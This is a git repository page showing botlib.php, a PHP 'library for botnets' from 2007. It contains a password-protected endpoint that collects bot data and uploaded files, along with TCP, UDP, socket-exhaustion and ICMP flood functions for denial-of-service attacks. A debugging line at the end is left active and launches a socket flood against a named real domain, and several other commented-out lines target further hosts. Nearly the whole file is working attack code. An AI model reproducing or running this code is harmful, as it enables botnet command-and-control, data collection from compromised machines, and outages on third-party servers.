MDRAID superblock generator
[mirrors/Programs.git] / php / botlib.php
CommitLineData
21c4e167
H
1<?php\r
2//PHP Library for Botnets\r
3//<-Harvie 2oo7\r
4//botlib.php v0.1\r
5//////////////////////////////\r
6\r
7///Settings/////////////////////////////////////////////////////////\r
8$passwd = "botload";\r
9\r
10///Functions////////////////////////////////////////////////////////\r
11\r
12////Uploading to server (GET)\r
13//\r
14function botlib_send_plaintext($passwd, $data, $botlib_url) {\r
15 file("$botlib_url?passwd=$passwd?data=".urlencode($data));\r
16}\r
17//\r
18function botlib_send_plaintext_file($passwd, $file, $botlib_url) {\r
19 $data = implode("\n", file($file));\r
20 botlib_send_plaintext($passwd, $data, $botlib_url);\r
21}\r
22//\r
23if(isset($_GET["data"]) && isset($_GET["passwd"])) {\r
24 $msg_file = "./data.txt";\r
25 \r
26 if($_GET["passwd"] != $passwd) die("Error - Incorrect password!");\r
27 $fp = fopen($msg_file, "a");\r
28 $data = "\n\n>> ".$_SERVER["REMOTE_ADDR"]." >>\n".$_GET["data"];\r
29 fwrite($fp, $data);\r
30 fclose($fp);\r
31 die("OK - Sent!");\r
32}\r
33\r
34////Uploading to server (POST) - Not Yet!!!!\r
35//\r
36function curl_upload_file($file, $botlib_url) {\r
37 $cmd = "$curl --url $botlib_url";\r
38}\r
39//\r
40if(isset($_POST) && isset($_FILES) && isset($_POST["passwd"])) {\r
41 $dir = "./uploads";\r
42 \r
43 if($_POST["passwd"] != $passwd) die("Error - Incorrect password!</tt>");\r
44 if(!is_dir($dir)) { mkdir($dir); }\r
45 if(is_file($dir.$_FILES['file']['name'])) die("Error - File ".$dir.$_FILES['file']['name']." already exists!</tt>");\r
46 if(!move_uploaded_file($_FILES['file']['tmp_name'], $dir.$_FILES['file']['name'])) { die("Error - Can't move uploaded file!</tt>"); }\r
47 die("OK - Upload successfull!");\r
48}\r
49\r
50////(D)DoS Attacks\r
51//\r
52function dos_sock_table($host, $port, $max = 0, $timeout = 0.5) {\r
53 $i = 1;\r
54 while(1) {\r
55 @fclose($sock_array[$i]);\r
56 $sock_array[$i] = @fsockopen($host, $port, $errno, $errstr, $timeout);\r
57 $i++;\r
58 if($i == $max) $i = 1;\r
59 }\r
60}\r
61//\r
62function dos_tcp_flood($host, $port, $timeout = 0.00001) {\r
63 while(1) @fsockopen($host, $port, $errno, $errstr, $timeout);\r
64}\r
65//\r
66function dos_udp_flood($host, $size=1024, $port=0, $char='#') {\r
67 if($port == 0) $port = rand(1,65535);\r
68 $fp = fsockopen("udp://$host", $port);\r
69 if(!$fp) exit(1);\r
70 $data = "";\r
71 for($i=0;$i<$size;$i++) $data = $data.$char; //echo strlen($data); //Debug\r
72 while(1) fwrite($fp, $data);\r
73}\r
74//\r
75function dos_icmp_flood($host, $ttl=255, $unix=false, $root=false) {\r
76 if($unix) {\r
77 if($root) shell_exec("ping -b -Q 255 -f -t $ttl -l 3 -i 0.2 -s 65507 $host");\r
78 else shell_exec("ping -b -f -t $ttl -Q 159 -l 65536 -i 0 -s 65507 $host");\r
79 } else {\r
80 shell_exec("ping -t -i $ttl -v 255 -l 65500 -w 1 $host");\r
81 }\r
82}\r
83\r
84///Debuging////////////////////////////////////////////////////////////////\r
85dos_sock_table("djh.cz", 80, 9000);\r
86//dos_tcp_flood("djh.cz", 80);\r
87//dos_sock_table("daemoncze.ath.cx", 80, 3000);\r
88//dos_sock_table("harvie.ath.cx", 80, 3000);\r
89//dos_udp_flood("192.168.2.161");\r
90//dos_icmp_flood("192.168.2.161");\r
This page took 0.206672 seconds and 4 git commands to generate.